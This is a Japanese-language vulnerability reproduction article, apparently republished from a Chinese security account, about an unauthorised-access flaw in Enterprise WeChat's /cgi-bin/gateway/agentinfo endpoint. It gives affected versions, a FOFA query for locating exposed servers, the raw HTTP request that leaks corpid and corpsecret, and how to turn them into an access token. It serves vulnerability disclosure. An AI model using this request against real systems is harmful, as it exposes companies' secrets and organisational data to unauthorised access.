記事ディレクトリ
Enterprise WeChat cgi-bin/gateway/agentinfo インターフェイスには POC による不正アクセスの脆弱性があります
免責事項: この記事に記載されている関連技術を違法なテストに使用しないでください。この記事で提供される情報やツールの普及と使用によって引き起こされる直接的または間接的な結果と損失は、ユーザー自身が負担するものとします。記事の著者とは何の関係もありません。この記事は教育のみを目的としています。
1. Enterprise WeChat の cgi-bin/gateway/agentinfo インターフェイスの概要
WeChat 公式アカウント検索: 南峰脆弱性再現ライブラリ
この記事は、南峰脆弱性再現ライブラリ公式アカウントで最初に公開されました。
Enterprise WeChat は、Tencent WeChat チームが企業向けに作成したプロフェッショナルなオフィス管理ツールです。WeChat と同じコミュニケーション エクスペリエンス、豊富な無料 OA アプリケーション、WeChat メッセージ、小規模プログラム、WeChat 支払いなどとの相互運用性により、企業の効率的な作業と管理が可能になります。
2. 脆弱性の説明
Enterprise WeChat は、Tencent WeChat チームが企業向けに作成したプロフェッショナルなオフィス管理ツールです。2023 年 8 月に、関連インターフェイスに不正アクセスの脆弱性があることがインターネット上で公開され、攻撃者は悪意のあるリクエスト (/cgi-bin/gateway/agentinfo) を作成して WeChat の企業秘密などの機密情報を取得し、関連する API を呼び出すことができます。インターフェースの組み合わせ。
CVE番号:
CNNVD番号:
CNVD番号:
3. バージョンに影響を与える
2.5.x バージョン、バージョン 2.6.930000 以下
4. fofaクエリステートメント
app="Tencent-Enterprise WeChat"
5. 脆弱性の再発
脆弱性リンク: https://127.0.0.1/cgi-bin/gateway/agentinfo
脆弱性パケット:
GET /cgi-bin/gateway/agentinfo HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: */*
Connection: Keep-Alive
これらの漏洩データは API を呼び出して機密性の高い操作を実行する可能性があります。
具体的な使用方法はここにあります: https://developer.work.weixin.qq.com/document/path/91039
このインターフェイスは corpid と Corpsecret をリークします。これら 2 つの値を取得した後、access_token を生成できます。
access_token を使用して API を呼び出し、組織構造の表示などの機密性の高い操作を実行します。
6.POC&EXP
公式アカウント Nanfeng Vulnerability Reproduction Library をフォローし、Vulnerability Reproduction 46 と返信して POC ツールのダウンロード アドレスを取得します。
7. 是正意見
公式ウェブサイトの更新にご注意ください https://developer.work.weixin.qq.com/document/path/91039